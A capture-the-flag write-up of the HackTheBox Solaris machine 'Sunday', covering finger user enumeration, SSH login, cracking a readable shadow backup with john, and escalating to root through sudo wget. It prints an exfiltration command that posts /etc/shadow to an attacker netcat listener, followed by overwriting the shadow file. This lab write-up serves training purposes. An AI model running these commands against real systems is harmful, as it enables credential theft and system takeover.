# SUNDAY | 10.10.10.76

## Initial Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap-initial 10.10.10.76
    
### Open Ports and Their Services

* 79 - FINGER - Sun Solaris fingerd
* 111 - RPCBIND
* 22022 - SSH - SunSSH 1.3

## Services Enumeration

Well this one is certainly different. It is a Solaris system, which I've nearly forgotten about. That and the open ports are somewhat unusual (especially port 79). 

And gonna put this near the top: this machine is unstable AF - it often appears offline to me, and I have to keep verifying it's status when I find I can't connect. Super annoying and probably one reason the box is rated so low on HTB.

### 79 - finger

An old-timey protocol, and a port you do not usually see open anymore. This protocol was/is used to identify logged-in users on a system. During the nmap scan, nmap used a script to see if there were any users logged on to the remote machine and came up empty. I might be missing something, or it'll make sense after I've enumerated the next service.

### 111 - RPCBIND

I can check for a null session here, and see if there is any kind of intel I can pull off the machine. But all I get is errors. Next!

### 22022 - SunSSH 1.3

A strange SSH client! I'll be honest here: the nmap scan was terrible because of the instability of this machine, so I looked up a writeup to find this port. I bet I'll need to modify my config to even properly connect to this dinosaur.

### Back to 79

Apparently I misread the finger enum that nmap did. It needs to be supplied a valid username, which I obviously do not have. But I googled 'finger user enumeration linux' and found a tool called 'finger-user-enum.pl' (which I had to install perl for) and I can supply it with a list of users (I just used rockyou) - hopefully there will be a hit.

![](img/finger.png)

Yay.

## Foothold

OK, let's try SSH (and yes, I had to add an option during connection with `-o KexAlgorithms=diffie-hellman-group1-sha1`):

![](img/sunny-shell.png)

Yes I have a shell, but it is laggy as hell, so it's not gonna be fun at all.

## User Enumeration - sunny

This user (sunny) does not have a flag as far as I can tell. The flag is in the other user's (sammy) Desktop dir, but sunny does not have permissions to read it.

![](img/denied.png)

So I'm going to have to escalate to either sammy or root.

`sudo -l` for sunny gives me a curious output:

![](img/sudo-l-sunny.png)

Running the script just outputs the word testing and then outputs the uid and gid of the user running it (in this case, root). But I can't examine, copy or modify it in any way, so it probably lives up to it's name. I'll continue enumerating, manually because I don't even want to bother with linpeas in such a hostile environment.

### cat /etc/passwd

![](img/etc-passwd.png)

### /backup

There is a backup folder in the root directory, which may or may not be unusual (since I am not familiar with SunOS):

![](img/backup.png)

Let's investigate:

![](img/shadow-backup.png)

A readable shadow backup file, how odd. Within are the hashed passwords of both regular users:

![](img/shadow.png)

With this info, maybe I can crack sammy's hash and become that user.

    unshadow passwd shadow > hashes
    john --wordlist=~/dox/wordlists/rockyou.txt hashes
    
And here we see that I have indeed found sammy's password:

![](img/john.png)

Let's use this and privesc.

## Privilege Escalation - sunny to sammy

A moment later and I am sammy (even though the prompt still says sunny?):

![](img/sammy-shell.png)

### Flag

![](img/sammy-flag.png)

## User Enumeration - sammy

Continuing on with this buggy AF machine, `sudo -l` gives me some good news:

![](img/sudo-l-sammy.png)

I can run wget as root. Let's check [GTFObins](https://gtfobins.github.io/) and see what we might be able to do:

![](img/gtfo.png)

Not actually that helpful with that info, but running wget as root means we can access files that are normally restricted, such as the root flag or the `/etc/shadow` file. Using the '--post-file' flag with wget allows us to upload files rather than download.

## Privilege Escalation - sammy to root via sudo wget

First step is to grab that shadow file, bring it over to my machine so I can modify it:

On my machine:

    nc -nvvlp 6969
    
On victim machine:

    sudo /usr/bin/wget --post-file=/etc/shadow http://10.10.14.20:6969
    
Then I grab the output and paste it into a 'newshadow' file on my end.

Next, I need to generate the hash for a new root password:

    openssl passwd -1 -salt root mnemonic
    
Then I put the output from that into the newshadow file, replacing the old content:

![](img/newshadow.png)

And download it on the victim machine using those sudo privs.

All that is left is to `su root` and then that is that:

![](img/root.png)

Good riddance.

## Conclusion

What a garbage machine. I'm not sure if it is just unstable now, or if it always was. But it is pointlessly discouraging and should be banished. There is not really even any point in it being Solaris, as you don't learn anything about the underlying OS and the privescs are basic and one of them relies on a world-readable shadow.backup? Give me a break.

Steps taken:

* Find usernames using finger enumeration tool
* Login via SSH with weak-ass passwords
* Escalate to more privileged user via world-readable shadow.backup
* Escalate to root by overwriting /etc/shadow via privileged wget file exfil
